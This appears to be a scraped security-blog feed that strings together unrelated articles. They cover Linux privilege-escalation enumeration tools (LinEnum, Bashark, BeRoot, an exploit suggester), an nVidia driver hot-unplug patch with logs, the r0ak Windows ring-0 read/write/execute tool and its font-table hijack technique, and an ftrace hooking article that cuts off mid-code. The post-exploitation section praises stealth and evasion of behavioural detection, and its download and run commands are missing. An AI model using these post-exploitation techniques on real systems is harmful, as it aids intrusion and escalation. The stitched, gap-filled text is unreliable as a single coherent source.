Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

Privileged access: Diagnose if the current user has sudo access without a password; whether the root’s home directory accessible.

System Information: Hostname, Networking details, Current IP and etc.

User Information: Current user, List all users including uid/gid information, List root accounts, Checks if password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it through github with help of following command:

Once you download this script, you can simply run it by tying ./ on terminal. Hence it will dump all fetched data and system details.

Let’s Analysis Its result what is brings to us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu


Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which comes under the Post exploitation.


Enumerates the system configuration and runs some privilege escalation checks as well. It is a python implementation to suggest exploits particular to the system that’s been taken under. Use wget to download the script from its source URL.

Now to use this script just type python on terminal and this will enumerate file and directory permissions/contents. This script works same as LinEnum and hunts details related to system network and user.

Let’s Analysis Its result what is brings to us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/

Checks if Root’s home folder is accessible

File having SUID/SGID Permission

For example: /bin/raj/ which is a bash script with SUID Permission

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version, and returns a list of possible exploits.

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.


Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute following command to download it from the github:


To execute the script you need to run following command:

The help command will let you know all available options provide by bashark for post exploitation.

With help of portscan option you can scan the internal network of the compromised machine.

To fetch all configuration file you can use getconf option. It will pull out all configuration file stored inside /etcdirectory. Similarly you can use getprem option to view all binaries files of the target‘s machine.


BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. This tool does not realize any exploitation. It mains goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connection, etc.) but to print only information that have been found as potential way to escalate our privilege.


To execute the script you need to run following command:

It will try to enumerate all possible loopholes which can lead to privilege Escalation, as you can observe the highlighted yellow color text represents weak configuration that can lead to root privilege escalation whereas the red color represent the technique that can be used to exploit.

It’s Functions:

Check Files Permissions

SUID bin

NFS root Squashing


Sudo rules

Kernel Exploit

Conclusion: Above executed script are available on github, you can easily download it from github. These all automated script try to identify the weak configuration that can lead to root privilege escalation.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quire reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.Картинки по запросу nvidiaThere’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceeded by whining from PCIe AER, sometimes not, I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars, passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modesetmodule. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
     struct pci_dev *dev;
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 #include "nv-gpu-info.h"
+#include <asm/atomic.h>
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
 } nvidia_modeset_rm_ops_t;
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
@@ -3217,6 +3229,7 @@
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
-    }
+            LOCK_NV_LINUX_DEVICES();
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+    return ret;
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 static struct semaphore nvkms_lock;
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
  * NVKMS executes queued work items on a single kthread.
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
     enum NvKmsClientType type;
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
@@ -719,6 +728,10 @@
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
     return ret;
@@ -726,12 +739,17 @@
     nvidia_modeset_stack_ptr stack = NULL;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
     if (__rm_ops.alloc_stack(&stack) != 0) {
     __rm_ops.close_gpu(gpuId, stack);
+    clopen_gpu_id = gpuId;
@@ -771,8 +789,14 @@
     popen->type = type;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
     *status = down_interruptible(&nvkms_lock);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
     if (*status != 0) {
         goto failed;
@@ -781,6 +805,9 @@
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
     *status = 0;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
     return popen;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
     nvkms_free(popen, sizeof(*popen));
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+        nvkms_close_gpu(popen->gpu_id);
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
     popen->data = NULL;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     nvkms_free(popen, sizeof(*popen));
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+    clopen_gpu_id = 0;
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
     return ret ? 0 : -EPERM;
+    up(&nvkms_lock);
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+    return -ENOENT;
@@ -1239,9 +1335,14 @@
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
      * At this point, any pending tasks should be marked canceled, but

Here’s some handy scripts I was using while debugging it:
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
rmmod nvidia-modeset
rmmod nvidia
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero On For Windows 10 Systems

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything else other than Administrator privileges.

Quick Peek

r0ak v1.0.0 -- Ring 0 Army Knife
Copyright (c) 2018 Alex Ionescu [@aionescu]

USAGE: r0ak.exe
       [--execute <Address | module.ext!function> <Argument>]
       [--write   <Address | module.ext!function> <Value>]
       [--read    <Address | module.ext!function> <Size>]


The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg), SysInternals Tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:

  • Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
  • Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
  • Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers as generic «read-write-everything» drivers are frowned upon.
  • Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI) which further restricts allowable drivers and blacklists multiple 3rd party drivers that had «read-write-everything» capabilities due to poorly written interfaces and security risks.
  • Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution ‘tricks’ obsoleted, so a new approach is needed.

In such an environment, it was clear that a simple tool which can be used as an emergency band-aid/hotfix and to quickly troubleshoot kernel/system-level issues which may be apparent by analyzing kernel state might be valuable for the community.

How it Works

Basic Architecture

r0ak works by redirecting the execution flow of the window manager’s trusted font validation checks when attempting to load a new font, by replacing the trusted font table’s comparator routine with an alternate function which schedules an executive work item (WORK_QUEUE_ITEM) stored in the input node. Then, the trusted font table’s right child (which serves as the root node) is overwritten with a named pipe’s write buffer (NP_DATA_ENTRY) in which a custom work item is stored. This item’s underlying worker function and its parameter are what will eventually be executed by a dedicated ExpWorkerThread at PASSIVE_LEVELonce a font load is attempted and the comparator routine executes, receiving the name pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.

Supported Commands
When using the --execute option, this function and parameter are supplied by the user.
When using --write, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using --read, the write gadget is used to modify the system’s HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy back into the tool’s user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed, Windows functionality is used, and all called functions are part of the KCFG bitmap, there is no violation of any security checks, and no debugging flags are required, or usage of 3rd party poorly-written drivers.


Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.

Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Research Centre (MSRC) which responded: «[…] doesn’t fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won’t be pursuing this to fix.»
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection : AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, which agreed this was currently out of scope of Windows’s architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.

Can’t this be packaged up as part of end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:

  • Require the target machine to be running Windows 10 Anniversary Update x64 or later
  • Have already elevated privileges to SYSTEM
  • Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
  • Require the Windows SDK/WDK installed on the target machine
  • Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk

Attackers interested in using this particular approach — versus very many others more cross-compatible, no-SYSTEM-right-requiring techniques — likely already adapted their own code based on the Proof-of-Concept from April 2015 — more than 3 years ago.


Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will lookup your installation path automatically, and leverage the DbgHelp.dll and SymSrv.dll that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source-code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should setup the _NT_SYMBOL_PATH variable pointing to an appropriate symbol server and cached location.
It is assumed that an IT Expert or other troubleshooter which apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.

Use Cases

  • Some driver leaked kernel pool? Why not call ntoskrnl.exe!ExFreePool and pass in the kernel address that’s leaking? What about an object reference? Go call ntoskrnl.exe!ObfDereferenceObject and have that cleaned up.
  • Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at ntoskrnl.exe!KdPrintCircularBuffer
  • Wondering how big the kernel stacks are on your machine? Try looking at ntoskrnl.exe!KeKernelStackSize
  • Want to dump the system call table to look for hooks? Go print out ntoskrnl.exe!KiServiceTable

These are only a few examples — all Ring 0 addresses are accepted, either by module!symbol syntax or directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.

The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:

  • Reads — Limited to 4 GB of data at a time
  • Writes — Limited to 32-bits of data at a time
  • Executes — Limited to functions which only take 1 scalar parameter

Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the --read and --write commands) occurs in the context of a System Worker Thread at PASSIVE_LEVEL. Therefore, user-mode addresses should not be passed in as parameters/arguments.

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Ftrace is a Linux kernel framework for tracing Linux kernel functions. But our team managed to find a new way to use ftrace when trying to enable system activity monitoring to be able to block suspicious processes. It turns out that ftrace allows you to install hooks from a loadable GPL module without rebuilding the kernel. This approach works for Linux kernel versions 3.19 and higher for the x86_64 architecture.

A new approach: Using ftrace for Linux kernel hooking

What is an ftrace? Basically, ftrace is a framework used for tracing the kernel on the function level. This framework has been in development since 2008 and has quite an impressive feature set. What data can you usually get when you trace your kernel functions with ftrace? Linux ftrace displays call graphs, tracks the frequency and length of function calls, filters particular functions by templates, and so on. Further down this article you’ll find references to official documents and sources you can use to learn more about the capabilities of ftrace.

The implementation of ftrace is based on the compiler options -pg and -mfentry. These kernel options insert the call of a special tracing function — mcount() or __fentry__() — at the beginning of every function. In user programs, profilers use this compiler capability for tracking calls of all functions. In the kernel, however, these functions are used for implementing the ftrace framework.

Calling ftrace from every function is, of course, pretty costly. This is why there’s an optimization available for popular architectures — dynamic ftrace. If ftrace isn’t in use, it nearly doesn’t affect the system because the kernel knows where the calls mcount() or __fentry__() are located and replaces the machine code with nop (a specific instruction that does nothing) at an early stage. And when Linux kernel trace is on, ftrace calls are added back to the necessary functions.

Description of necessary functions

The following structure can be used for describing each hooked function:


 * struct ftrace_hook    describes the hooked function
 * @name:                the name of the hooked function
 * @function:            the address of the wrapper function that will be called instead
